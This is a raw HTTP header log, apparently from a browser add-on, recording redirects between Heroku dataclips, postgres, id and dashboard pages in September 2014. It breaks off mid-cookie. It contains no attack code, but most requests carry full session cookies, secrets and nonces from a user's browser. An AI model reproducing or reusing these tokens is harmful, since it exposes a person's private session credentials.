Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] - Connection[keep-alive] - Response Header: - Server[Cowboy] - Date[Sat, 20 Sep 2014 15:55:42 GMT] - Connection[keep-alive] - Strict-Transport-Security[max-age=31536000] - X-Frame-Options[SAMEORIGIN] - X-XSS-Protection[1; mode=block] - x-content-type-options[nosniff] - Content-Type[text/html;charset=utf-8] - Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure -heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure -rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5IxbkOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCnvRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJroQXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLqdiNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b066d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] - Vary[Accept-Encoding] - Content-Encoding[gzip] - Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3] - Transfer-Encoding[chunked] - Via[1.1 vegur] - - -17:56:11.833[437ms][total 437ms] Status: 302[Found] -GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] - Request Header: - Host[postgres.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://dataclips.heroku.com/clips/new] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df04da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] - Connection[keep-alive] - Response Header: - Server[Cowboy] - Connection[close] - Date[Sat, 20 Sep 2014 15:56:22 GMT] - status[302 Found] - Strict-Transport-Security[max-age=99; includeSubdomains] - X-Frame-Options[SAMEORIGIN] - X-XSS-Protection[1] - Location[https://postgres.heroku.com/login] - Content-Type[text/html; charset=utf-8] - x-ua-compatible[IE=Edge,chrome=1] - Cache-Control[no-cache, private] - Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; path=/; secure; HttpOnly] - x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d] - x-runtime[0.008472] - x-rack-cache[miss] - Via[1.1 vegur] - - -17:56:12.273[183ms][total 183ms] Status: 302[Found] -GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] - Request Header: - Host[postgres.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://dataclips.heroku.com/clips/new] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] - Connection[keep-alive] - Response Header: - Server[Cowboy] - Connection[close] - Date[Sat, 20 Sep 2014 15:56:22 GMT] - status[302 Found] - Strict-Transport-Security[max-age=99; includeSubdomains] - X-Frame-Options[SAMEORIGIN] - X-XSS-Protection[1] - Location[https://postgres.heroku.com/auth/heroku] - Content-Type[text/html; charset=utf-8] - x-ua-compatible[IE=Edge,chrome=1] - Cache-Control[no-cache, private] - Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure -super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure -postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure] - x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3] - x-runtime[0.005907] - x-rack-cache[miss] - Via[1.1 vegur] - - -17:56:13.046[161ms][total 897ms] Status: 200[OK] -GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] - Request Header: - Host[id.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://dataclips.heroku.com/clips/new] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbXj9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsDCHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkXY49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxRcfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtcWrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3Vxz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzniCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365] - Connection[keep-alive] - Response Header: - Server[Cowboy] - Date[Sat, 20 Sep 2014 15:56:22 GMT] - Connection[keep-alive] - Strict-Transport-Security[max-age=31536000] - X-Frame-Options[SAMEORIGIN] - X-XSS-Protection[1; mode=block] - x-content-type-options[nosniff] - Content-Type[text/html;charset=utf-8] - Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure -heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure -rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLaKgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmipSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXHanhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAjCO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBmnCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQn0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PYVkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure] - Vary[Accept-Encoding] - Content-Encoding[gzip] - Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d] - Transfer-Encoding[chunked] - Via[1.1 vegur] - - -17:56:37.841[603ms][total 603ms] Status: 302[Found] -GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] - Request Header: - Host[dashboard.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://dataclips.heroku.com/] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af37490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; user_session_secret=BAhJIgKKBWFGcHhTbVkzVUVjeE1TdGxVSGcwWTJ3clRVMTVWWE5pYkZsUFVrRkpVMkpPYkRsR2VVdHRVeTlQWTBkaFl5OUJlSGRHVVVNMEswOW5SR1pvUVVSdFZYUk9SVWxVZGxKS1UwdHJiRTgxZEhRNGMxTnJNbUZrYVVsa01VMUdWRmxJUVVkUlMxZzJTVkJ2YUdwSVJpdGtSSFVyWTNkRVdISkJjelp4UXpVMGRVOHZMekF4UzFCT2JYRXJibVpUTUV4SVJIVmxaa2QzTmtWQlJsSk5ibEpIWkVodksyVnphV1JXVEUxdlQzcEVOREYwWjNSc2RUUndhRmwyVUdObk0xaEJMMVpQUlN0SVMyazVkbWg1UzBWV1RsTlVWVVEyVjJOVFF6VlZUemxRVlZkelZIWm5WbFpxV21FMGJIRjJZM1F2UlRWSlN6Z3hVVkJNVVc1cWQwRjJRekJEWVVrd2RuY3dhVnBtTjFaQlluWlZlSEZCU2k5WGNYZ3pkVEJKTlRGaVNHSnRNRUpSVGpWdmJXVndjSEJsVGpKa09WVTNkM0pFVUd0WFVsaDNSbHBJVjNjd01WQkllbTlWUmtodlFXOUNXbEl4WlZkdmVIQk9ZVTVGWVdKM2FGcE5ORzFuU1ZCVmVHOVFUbTlHWkVKTFQzRkRLM3BVVjAxT1dYVXlUR055YTBGVGIwOVhSbFZ2UWxjMmEwVTBjV2R5TWpSVk9IWnBkSEEwY1RkaFZEZFpLeTloUnpSUVZtNW9Xa3hVVkVkUWFIWjRjamxhTUhoSE5FUk9RbTVwZW1RemNHcHlUVmhWWkVWelVEWk5PRlpvYkRNM2NscFBjR3RMUnpsRmVuVllSbXBCVlRseWNuZE1hSGMxVDJ4VGNVNW1lR0pVVnl0a2N6bFZZVlpqYkZsSFlXNHhZMWhvVVZFMFVVaG5iRzltTmpsRmFXZDRiVUp6VEhCQlZrZzFaWFpJVW1GQ01rNU5URUZuVnpGSlkyUkdSRnBaVkdJeVkwdGlWVm81ZEU1RGJFTXZha2xIVHpGWmJUQm9SREJ3WWtsUFpVVTJlWEJvUTA1amVTOURjbmw0UWpCa2EyRXZhblJtY1U5ak4wSk9kbkpYVEhKTGR5dGpSaXMyVlhwdWEzVnFiRlpKVXpkdldteDVVSFJrVTFsaVJXMHJjMVowVlhwcVdsSTRVV3dyY25GWFZFaEZMM1ZQTlZWRVRGSlRPRk14Y2s1MFltRXdaelZUTkV0aFZqTmFZbFJ4T1N0WGNtMXBTR3RuWW1abVpYQkZXVVpQV21aM1JUZ3dNekUxTjA1ME5FOXBVRFF2Ykc1TGJYSjBVUzltTTAxRFkwcEdaVnAzUjNsSE5rNW5aRk5XSzNwT1ExVnhPR2hKVGpWd1NqaGtTWE4wTkdacVFrUTFRMk5IV0dwb1JYbFNPWEoxZG05T1pWWXlhM2xpUW1wMWJHVmxTelJ6V2xWMVZURkhMMDE1Y210SlVrVkVMMjk2T0ZKTWEwTTNVVWRyTkVNcmEwOXJibEJWTW5GcVMxRnRjMFJsU1VobWREbHRPV3hvTDNkRE9ITmtjVGwxVFRoRlpXaHJaVk5hTlV0VWFIaFBVVVZGUVRCQk4wWmxNMmR4ZVdoNlJHMDJXRzFhVG1OVVlVaDZTMDl6U3pNM2MzUk5PWEJaTUhWUFEwNVlRekZJWmpCS01HaGFVM05XYVU4NFVtZFNOVnBoUW5SWUsyNDVWbkZhUWxWdlkxZHpPVFo0TjFWc1pGbHRTV0pOWkdwU2EwYzRaejB0TFVkRWRUWm1TV0ZVU2tjM1NXeFdRekJCYWs1cGJFRTlQUT09LS1jZTZmNmQ0MTBhNjQyNzhmZGNkMmEwMjk0ZDUxOGJhNjU0NmQzM2FjBjoGRUY%3D--bd9c611ce38c8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D] - Connection[keep-alive] - Response Header: - Connection[keep-alive] - Server[nginx/1.5.7] - Date[Sat, 20 Sep 2014 15:56:48 GMT] - Content-Type[text/html; charset=utf-8] - Transfer-Encoding[chunked] - status[302 Found] - Strict-Transport-Security[max-age=31536000] - Location[https://dashboard.heroku.com/login] - Cache-Control[must-revalidate, no-cache, no-store, private] - Pragma[no-cache] - Expires[0] - X-Frame-Options[SAMEORIGIN] - x-ua-compatible[IE=Edge,chrome=1] - Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c148efa8ef6adb5a004d99; path=/; secure; HttpOnly] - x-request-id[5e276c4f-1382-4328-ae95-b87a73376089] - x-runtime[0.006972] - x-rack-cache[miss] - Via[1.1 vegur] - - -17:56:39.215[207ms][total 207ms] Status: 304[Not Modified] -GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] - Request Header: - Host[dataclips.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://dataclips.heroku.com/] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=ZXNtT29YN3FZajNrQ2U0OTBWbzZ2VHlWSUJDdnVtNmV3TEtLc25ZT0h5MW9rS2FRVzRZblpLRktRQkd3ZXZPY2hwMm41a1VjSlNEY3VGbkVXYjRQTWVLcmFsTEk4MDQvc1laWTViZ2JVZ2RzUEdMNFpGY2JZRTdwdWN3K3ZWTW56VEVpcFU4OHg1T1BQMHBGbTdkNlNFakpZMjVMVE1mNnZxM2dPL3BNKzZ1VVljeTRGUk4rbEhqcld1UEdBR3lCdDM5RkxpZk1hZWsyZkFyY0dGZmVxeUlheUt5NXhaNGNJb1ZTR2VkL1o0ZHM2OW9HTnBZb1dOZys3dVpGSFdKRDA1TysvaHg2enlWMGhLaVhnUmxwbnQ0S1JMeVl3WHFvZWwvaUI2Qy9rQU9aMmhqNllDVVJXa0FsNXZwZEdCQVpWS2d0VTlvMjZPQ1hENy9tZmE0REdZT1NvdmN3SDcrMG15dElDRlFNVkJEN24yWS9lUU03RjduTDkzQlAxcnpkNHhldEhQOVpyZjNUM3JVaU5Fek9BcmI5WGNsN0c2dFRPMTZqMjRyNnZnRndBYi9rWEcyTGMwMTZadGxhQmVWQ1hQUURyUk9tZjZtZitTSk1LMmNhQmFkOEJ3NFQreGdxUS9qeXFrUHdNQWt5cXJvRWxTQis1R1lTWThkeHI4YzRrQVVROFdhTzZEb0pMZTR3K3pLZXBoUkVMMlBncUNQZlpleTRPY1U1cHJrPS0tMHFTV09tekRBajVKeXlPS0dESE82QT09--f620fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365] - Connection[keep-alive] - If-None-Match["015d655373394c49a35217e89173847e"] - Response Header: - Content-Length[0] - Connection[keep-alive] - Server[nginx/1.5.7] - Date[Sat, 20 Sep 2014 15:56:49 GMT] - status[304 Not Modified] - Strict-Transport-Security[max-age=31536000] - X-XSS-Protection[1; mode=block] - x-content-type-options[nosniff] - X-Frame-Options[SAMEORIGIN] - Etag["015d655373394c49a35217e89173847e"] - Cache-Control[max-age=0, private, must-revalidate] - Set-Cookie[_session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW